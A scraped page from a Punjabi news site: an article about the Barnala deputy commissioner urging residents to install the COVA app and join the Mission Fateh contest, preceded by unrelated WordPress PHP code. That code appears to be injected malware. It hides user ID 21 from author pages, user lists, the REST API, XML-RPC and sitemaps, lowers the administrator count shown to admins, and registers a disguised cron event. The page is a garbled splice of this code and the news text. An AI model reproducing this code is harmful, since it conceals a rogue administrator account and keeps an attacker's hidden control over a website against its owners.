add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 21;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 21 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 21;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 21;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 21;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
ਕੋਵਿਡ 19 ਖ਼ਿਲਾਫ਼ ਹਥਿਆਰ ਸਾਬਿਤ ਹੋ ਰਹੀ ਹੈ ਕੋਵਾ ਐਪ: ਤੇਜ ਪ੍ਰਤਾਪ ਸਿੰਘ ਫੂਲਕਾ - Press Ki Taquat
No Result
View All Result
ਬਰਨਾਲਾ, 14 ਜੁਲਾਈ (ਰਾਕੇਸ਼ ਗੋਇਲ/ਰਾਹੁਲ ਬਾਲੀ):- ਪੰਜਾਬ ਸਰਕਾਰ ਵੱਲੋਂ ਬਣਾਈ ਗਈ ਕੋਵਾ ਐਪ ਕੋਵਿਡ 19 ਖ਼ਿਲਾਫ਼ ਜਾਗਰੂਕਤਾ ਅਤੇ ਹੋਰ ਗਤੀਵਿਧੀਆਂ ਵਿਚ ਸਹਾਈ ਸਾਬਿਤ ਹੋ ਰਹੀ ਹੈ। ਇਸ ਗੱਲ ਦਾ ਪ੍ਰਗਟਾਵਾ ਕਰਦਿਆਂ ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਸ੍ਰੀ ਤੇਜ ਪ੍ਰਤਾਪ ਸਿੰਘ ਫੂਲਕਾ ਨੇ ਦੱਸਿਆ ਕਿ ਜ਼ਿਲ•ਾ ਵਾਸੀ ਇਸ ਐਪ ਨੂੰ ਕੋਰੋਨਾ ਖਿਲਾਫ ਹਥਿਆਰ ਵਜੋਂ ਇਸਤੇਮਾਲ ਕਰਕੇ ਇਸ ਬਿਮਾਰੀ ਨੂੰ ਮਾਤ ਦੇ ਸਕਦੇ ਹਨ। ਉਨ•ਾਂ ਦੱਸਿਆ ਕਿ ਜ਼ਿਲ•ਾ ਬਰਨਾਲਾ ਵਿਚ ਮਿਸ਼ਨ ਫਤਿਹ ਮੁਹਿੰਮ ਜਾਰੀ ਹੈ, ਜਿਸ ਤਹਿਤ ਕੋਵਾ ਐਪ ਰਾਹੀਂ ਮਿਸ਼ਨ ਫਤਿਹ ਮੁਕਾਬਲਾ ਕਰਵਾਇਆ ਜਾ ਰਿਹਾ ਹੈ। ਇਸ ਮੁਹਿੰਮ ਤਹਿਤ ਉਨ•ਾਂ ਨੇ ਖੁਦ ਵੀ ਕੋਵਾ ਐਪ ਡਾਊਨਲੋਡ ਕਰ ਕੇ ਮਿਸ਼ਨ ਫਤਿਹ ਜੁਆਇਨ ਕੀਤਾ ਹੋਇਆ ਹੈ।
ਉਨ•ਾਂ ਦੱਸਿਆ ਕਿ ਇਸ ਐਪ ਦਾ ਸਭ ਤੋਂ ਵਧੀਆ ਫੀਚਰ ਇਹ ਹੈ ਕਿ ਇਹ ਸਾਡੇ ਨੇੜੇ ਦੇ ਕੋਵਿਡ ਮਰੀਜ਼ ਤੋਂ ਦੂਰੀ ਬਾਰੇ ਦੱਸ ਦਿੰਦੀ ਹੈ ਤੇ ਜੇਕਰ ਅਸੀਂ ਕਿਸੇ ਸ਼ੱਕੀ ਮਰੀਜ਼ ਦੇ ਨੇੜੇ ਵੀ ਜਾਂਦੇ ਹਾਂ ਤਾਂ ਇਹ ਸਾਨੂੰ ਸੁਚੇਤ ਕਰਦੀ ਹੈ। ਇਸ ਐਪ ‘ਤੇ ਕੋਵਿਡ ਸਬੰਧੀ ਹਰ ਸਰਕਾਰੀ ਸੂਚਨਾ ਮਿਲਦੀ ਹੈ। ਕੋਵਿਡ ਮਰੀਜ਼ਾਂ ਸਬੰਧੀ ਰੀਅਲ ਟਾਈਮ ਸੂਚਨਾ ਵੀ ਮਿਲਦੀ ਹੈ। ਫਤਿਹ ਯੋਧਾ ਮੁਕਾਬਲੇ ਵਿਚ ਭਾਗ ਲੈਣ ਦਾ ਸੱਦਾ ਦਿੰਦੇ ਹੋਏ ਉਨ•ਾਂ ਕਿਹਾ ਕਿ ਕੋਵਾ ਐਪ ਪੂਰੀ ਤਰ•ਾਂ ਸੁਰੱਖਿਅਤ ਸਰਕਾਰੀ ਐਪ ਹੈ, ਜਿਸ ‘ਤੇ ਕੋਵਿਡ 19 ਸਬੰਧੀ ਹਰ ਅਧਿਕਾਰਤ ਜਾਣਕਾਰੀ ਸਰਕਾਰ ਵੱਲੋਂ ਮੁਹਈਆ ਕਰਵਾਈ ਜਾਂਦੀ ਹੈ। ਇਸ ਐਪ ਰਾਹੀਂ ਲੋਕ ਈ-ਪਾਸ ਵੀ ਜਨਰੇਟ ਕਰ ਸਕਦੇ ਹਨ। ਈ-ਸੰਜੀਵਨੀ ਰਾਹੀਂ ਡਾਕਟਰਾਂ ਨਾਲ ਵੀਡੀਓ ਕਾਲ ਕਰ ਸਕਦੇ ਹਨ। ਦੂਜੇ ਰਾਜਾਂ ਤੋਂ ਆਉਣ ਵਾਲੇ ਜਾਂ ਭੀੜ ਦੀ ਸੂਚਨਾ ਦੇ ਸਕਦੇ ਹਨ। ਇਹ ਬਲੂਟੁੱਥ ਅਤੇ ਲੋਕੇਸ਼ਨ ਦੇ ਅਧਾਰ ‘ਤੇ ਯੂਜ਼ਰ ਨੂੰ ਕੋਵਿਡ ਦੇ ਖਤਰੇ ਤੋਂ ਸੁਚੇਤ ਕਰਦੀ ਹੈ।
ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਨੇ ਦੱਸਿਆ ਕਿ ਇਸ ਐਪ ਰਾਹੀਂ ਮਿਸ਼ਨ ਫਤਿਹ ਨਾਲ ਵੀ ਜੁੜਿਆ ਜਾ ਸਕਦਾ ਹੈ। ਇਸ ਲਈ -ਕੋਵਾ ਪੰਜਾਬ- ਐਪ ਡਾਊਨਲੋਡ ਕਰੋ। ਹੋਮਪੇਜ ਤੇ -ਜੁਆਇਨ ਮਿਸ਼ਨ ਫਤਿਹ- ਤੇ ਕਲਿਕ ਕਰੋ। ਥੋੜਾ ਨੀਚੇ ਜਾਓ ਤੇ -ਜੁਆਇਨ ਨਾਓ- ਤੇ ਕਲਿਕ ਕਰੋ। ਆਪਣੇ ਵੇਰਵੇ ਦਰਜ ਕਰੋ। ਰੈਫਰਲ ਕੋਡ ਭਰੋ ਤੇ ਫੋਟੋ ਲਗਾ ਕੇ ਸਬਮਿਟ ਕਰ ਦਿਓ। ਰੋਜ਼ਾਨਾ ਆਪਣਾ ਰਿਸਪਾਂਸ ਦਿਓ ਅਤੇ ਇੱਥੇ ਜਨਰੇਟ ਹੋਣ ਵਾਲੇ ਤੁਹਾਡੇ ਰੈਫਰਲ ਕੋਡ ਨਾਲ ਹੋਰਨਾਂ ਨੂੰ ਮਿਸ਼ਨ ਫਤਿਹ ਜੁਆਇਨ ਕਰਾਓ ਅਤੇ ਪਾਓ ਮਾਣ ਮਿਸ਼ਨ ਫਤਿਹ ਯੋਧਾ ਬਣਨ ਦਾ। ਸਭ ਤੋਂ ਵੱਧ ਪੁਆਇੰਟ ਪ੍ਰਾਪਤ ਕਰਨ ਵਾਲੇ 1000 ਮਿਸ਼ਨ ਯੋਧਿਆਂ ਨੂੰ ਪੰਜਾਬ ਸਰਕਾਰ ਵੱਲੋਂ ਸਰਟੀਫਿਕੇਟ ਅਤੇ ਟੀ ਸ਼ਰਟ ਭੇਟ ਕੀਤੀ ਜਾਵੇਗੀ।
ਡਿਪਟੀ ਕਮਿਸ਼ਨਰ ਨੇ ਸਭ ਨੂੰ ਅਪੀਲ ਕੀਤੀ ਕਿ ਉਹ ਕੋਵਿਡ 19 ਬਿਮਾਰੀ ਸਬੰਧੀ ਹਰ ਸਹੀ ਜਾਣਕਾਰੀ ਲਈ ਆਪਣੇ ਮੋਬਾਈਲ ‘ਤੇ ਕੋਵਾ ਐਪ ਜ਼ਰੂਰ ਡਾਉਨਲੋਡ ਕਰਨ। ਉਨਾਂ ਦੱਸਿਆ ਕਿ ਇਸ ਤੋਂ ਬਿਨਾਂ ਮੋਬਾਇਲ ਨੰਬਰ 94653- 39933 ‘ਤੇ ਮਿਸ ਕਾਲ ਕਰਕੇ ਵੀ ਮਿਸ਼ਨ ਫਤਿਹ ਨਾਲ ਜੁੜਿਆ ਜਾ ਸਕਦਾ ਹੈ।
ਬੌਕਸ ਲਈ ਪ੍ਰਸਤਾਵਿਤ
ਮਿਸ਼ਨ ਫਤਿਹ ਯੋਧਿਆਂ ਵਜੋਂ ਉਭਰ ਰਹੇ ਹਨ ਵਲੰਟੀਅਰ
ਯੁਵਕ ਸੇਵਾਵਾਂ ਵਿਭਾਗ ਦੇ ਸਹਾਇਕ ਡਾਇਰੈਕਟਰ ਵਿਜੈ ਭਾਸਕਰ ਦੀ ਅਗਵਾਈ ਵਿਚ ਐਨਐਸਐਸ ਤੇ ਹੋਰ ਯੂਥ ਵਲੰਟੀਅਰ ਮਿਸ਼ਨ ਫਤਿਹ ਨੂੰ ਸਫਲ ਬਣਾਉਣ ਲਈ ਲਗਾਤਾਰ ਸੇਵਾਵਾਂ ਨਿਭਾਅ ਰਹੇ ਹਨ। ਇਹ ਵਲੰਟੀਅਰ ਜਿੱਥੇ ਪੈਂਫਲਿਟ ਵੰਡ ਕੇ ਲੋਕਾਂ ਨੂੰ ਕਰੋਨਾ ਵਿਰੁੱਧ ਜਾਗਰੂਕ ਕਰ ਰਹੇ ਹਨ, ਉਥੇ ਜ਼ਿਲ•ਾ ਵਾਸੀਆਂ ਨੂੰ ਕੋਵਾ ਐਪ ਡਾਊਨਲੋਡ ਕਰਵਾਉਣ ਦੇ ਨਾਲ ਨਾਲ ਖੁਦ ਮਿਸ਼ਨ ਫਤਿਹ ਯੋਧਿਆਂ ਵਜੋਂ ਉਭਰ ਰਹੇ ਹਨ।
Post Views: 99
No Result
View All Result